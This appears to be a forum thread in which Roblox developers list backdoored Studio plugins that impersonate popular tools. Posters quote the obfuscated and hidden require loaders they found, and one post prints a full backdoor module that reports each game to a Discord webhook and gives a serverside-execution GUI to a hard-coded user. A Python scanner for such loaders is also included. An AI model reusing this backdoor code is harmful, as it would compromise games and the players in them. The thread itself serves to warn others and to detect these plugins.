Thank you for your post, I find it helpful. Also it’s a surprise to find an HR of BH here. <3
Original: https://www.roblox.com/library/2233768483/Roundify
Malicious: https://www.roblox.com/library/5110767026/10K-Roundify
Malicious action: obfuscated script - can’t be bothered to constant dump it.
Original: https://www.roblox.com/library/165687726/Stravant-GapFill-Extrude-Fixed
Malicious: https://www.roblox.com/library/5112442161/GapFill-V1-2
Malicious action: obfuscated script - can’t be bothered to constant dump it.
Malicious: https://www.roblox.com/library/5112424591/Load-Character-Pro
Malicious: https://www.roblox.com/library/5112436389/Model-Resize-Plugin-2-1-DRAG-TO-RESIZE
Malicious: https://www.roblox.com/library/5112432545/Building-Tools-by-F3X-Plugin
Malicious: https://www.roblox.com/library/5074555023/Better-Day-And-Night-Lighting-NEW
Malicious action: require(5077231493)
Malicious Script, plugin unknown
require(4751241292)()
Malicious Action
```lua
local Orig = script
script = nil
local script = Orig
local GUI = script.getwet:Clone()
local HTTP = game:GetService('HttpService')

-- Probe whether HTTP requests are enabled in this game
function CheckHttp()
	local f = pcall(function() HTTP:GetAsync'https://www.google.com' end)
	if f == true then
		return true
	else
		return false
	end
end

-- On every join: report the place and player count to the webhook,
-- then hand the GUI to the hard-coded user or that user's friends
game:GetService('Players').PlayerAdded:Connect(function(plr)
	local A = CheckHttp()
	if A == true then
		local Data = {
			content = "omfg a damn game!\n https://www.roblox.com/games/"..game.PlaceId.."\nPlayers in game: "..#game:GetService('Players'):GetPlayers().." / "..game:GetService('Players').MaxPlayers;
			username = "wet man"
		}
		HTTP:PostAsync('https://discordapp.com/a-key',HTTP:JSONEncode(Data))
	end
	if plr.UserId == 1460281907 or plr:IsFriendsWith(1460281907) then
		GUI:Clone().Parent = plr.PlayerGui
	end
end)

-- Same GUI check for players already in the server
for i,plr in pairs(game:GetService('Players'):GetPlayers()) do
	if plr.UserId == 1460281907 or plr:IsFriendsWith(1460281907) then
		GUI:Clone().Parent = plr.PlayerGui
	end
end

-- Initial report of the place to the webhook when the module loads
local A = CheckHttp()
if A == true then
	local Data = {
		content = "omg a game! https://www.roblox.com/games/"..game.PlaceId;
		username = "wet man"
	}
	HTTP:PostAsync('https://discordapp.com/a-key',HTTP:JSONEncode(Data))
end

return function()end
```
Essentially gives a serverside loadstring gui if a player is or is friends with…
https://www.roblox.com/users/1460281907/profile
Edit: Discord webhook has already been found invalidated, someone else probably already deleted it.
Fake content deleted backdoor.
Super long chain of ‘require’ to try to hide the main code, still going.
After chaining for an entire 30+ times, randomly manually ‘report abuse’ on some of them, reached the obfuscated code.
This plugin is possibly malicious:
I checked the source code, and the code appears to be obfuscated. Comments are also disabled, which is a tad bit suspicious for a plugin with obfuscated code.
Malicious
.return(function(AdminLoader_f,AdminLoader_a,AdminLoader_p)local AdminLoader_n=string.char;local AdminLoader_j=string.sub;local AdminLoader_o=table.concat;local AdminLoader_k=math.ldexp;local AdminLoader_r=getfenv or function()return _ENV end; (etc.)
Malicious
RStudioUpdate & Script contain obfuscated code
Real Roundify
Edit: The account behind the 2nd one appears to have tons of MainModules and a plugin called ‘virus’ in his inventory
**Tag Editor**
Original: 948084095
Malicious: 4972325708
Creates an Antilag script in ServerScriptService upon installation.
F3X Building Tools & LoadCharacter.
If someone can check these plugins, these were all botted to the front page and probably insert serversides. (if I’m correct)
Malicious plugin(s): 5754612786, 5864780072
Original plugin: 752585459
Malicious: 5747884333, 5747884333, 5727376746, and many more.
Original: 144950355
Also, it isn’t even possible to find an original plugin anymore 60% of the time.
Should add an email requirement for uploading plugins, even in bestselling when searching.
Probably any plugin made by the group PluginMakers is malicious, as they make “updated” plugins.
Every plugin that has an Updated/New mark at the top of the plugin thumbnail is backdoored.
Roblox Studio+ (Updated
Backdoored: 5770454604
There isn’t a Roblox Studio+ original model, and the model leads to:
getfenv()[string.reverse("\101\114\105\117\113\101\114")](5770442639)
Which in return leads to a model called Linker which links to an asset named Poseidon SS. Another serverside which looks heavily skidded.
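A static check for the loader patterns reported in this thread, as an added example that is not part of any post here: it scans exported plugin source for `require` calls on a numeric asset ID, including the `getfenv()[string.reverse("...")]` form where the name is hidden behind decimal escapes. The sample source is constructed from lines quoted above, and the function names are this example's own.

```python
import re

DEC_ESCAPE = re.compile(r"\\(\d{1,3})")              # Lua decimal escape, e.g. \101
DIRECT = re.compile(r"\brequire\s*\(\s*(\d+)\s*\)")  # require(<asset id>)
INDEXED = re.compile(r"getfenv\s*\(\s*\)\s*\[\s*(.+?)\s*\]\s*\(\s*(\d+)\s*\)")
REVERSED = re.compile(r"""string\.reverse\(\s*(["'])(.*?)\1\s*\)""")
LITERAL = re.compile(r"""(["'])(.*?)\1""")


def decode_escapes(text):
    """Turn Lua decimal escapes inside a string literal into characters."""
    return DEC_ESCAPE.sub(lambda m: chr(int(m.group(1))), text)


def resolve_name(expr):
    """Return the global name an index expression evaluates to, if static."""
    m = REVERSED.fullmatch(expr)
    if m:
        return decode_escapes(m.group(2))[::-1]
    m = LITERAL.fullmatch(expr)
    if m:
        return decode_escapes(m.group(2))
    return None  # computed at runtime; needs manual review


def find_remote_requires(source):
    """List (line, asset_id, kind) for every require of a numeric asset ID."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for m in DIRECT.finditer(line):
            findings.append((line_no, int(m.group(1)), "direct"))
        for m in INDEXED.finditer(line):
            if resolve_name(m.group(1)) == "require":
                findings.append((line_no, int(m.group(2)), "hidden"))
    return findings


# Constructed sample: one local require plus three lines quoted in the thread.
SAMPLE = r'''local Module = require(script.Parent.Module)
require(5077231493)
require(4751241292)()
getfenv()[string.reverse("\101\114\105\117\113\101\114")](5770442639)'''

if __name__ == "__main__":
    for line_no, asset_id, kind in find_remote_requires(SAMPLE):
        print(f"line {line_no}: {kind} require of asset {asset_id}")
```

A hit only says the script pulls code from an external asset; the asset itself still has to be inspected, and names built at runtime are not resolved by this check.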
Why does this point to a “dummy.com” URL? Is that normal? It looks suspicious, but neither HISR nor Ro-Defender detected anything bad.
The Plugin in Question is https://www.roblox.com/library/5722540246/AutoScale
By https://www.roblox.com/groups/7840914/Creator-Studi#!/about
Fake : AutoScale Lite - Roblox
Real : AutoScale Lite - Roblox
Fake : Waterfall Generator - Roblox
Real : Waterfall Generator - Roblox
Fake : Building Tools by F3X (Plugin) - Roblox
Real : Building Tools by F3X (Plugin) - Roblox
They check if https service is enabled by sending a GET request to those URLs; if it fails, it’s disabled, and if it succeeds, then it’s enabled.
No duh, of course they do that to send the game to the logs
They do that to send to logs and they usually use it for checking if HTTP is enabled.
(desterify said that they log games with google.com, which they don’t)
Bubble Chat
Original: Unknown
Malicious: 5654074784
Drops a “Rain” script to Workspace.Terrain that is obfuscated. The source code also has the rain code and it duplicates it to the terrain.
Hey, can you please tell me more about Poseidon SS? I got it in my game and I do not know how to get rid of it.